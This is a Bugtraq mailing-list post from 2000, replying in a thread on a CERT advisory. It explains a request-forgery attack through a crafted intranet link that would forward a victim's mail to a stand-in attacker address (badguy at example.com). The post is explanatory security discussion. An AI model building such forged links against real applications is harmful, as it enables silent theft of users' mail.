Bugtraq mailing list archives
Re: Fwd: CERT Advisory CA-2000-02
From: sekurity () HOTMAIL COM (Cassius)
Date: Thu, 3 Feb 2000 22:11:36 GMT
Shockro, The danger is also in variables. Pretend that I get you to click on this link from within your custom intranet mail app. badguy () example com">http://intranet.example.com/mailbox.asp?action=forward&item=all&recipient=badguy () example com</A> It would forward all of your mail to badguy () example com. This would work because you already have a session with mailbox.asp. Of course mailbox.asp is fake but you get the idea. -Cassius ______________________________________________________ Get Your Private, Free Email at http://www.hotmail.com
Current thread:
- Re: Fwd: CERT Advisory CA-2000-02 Cassius (Feb 03)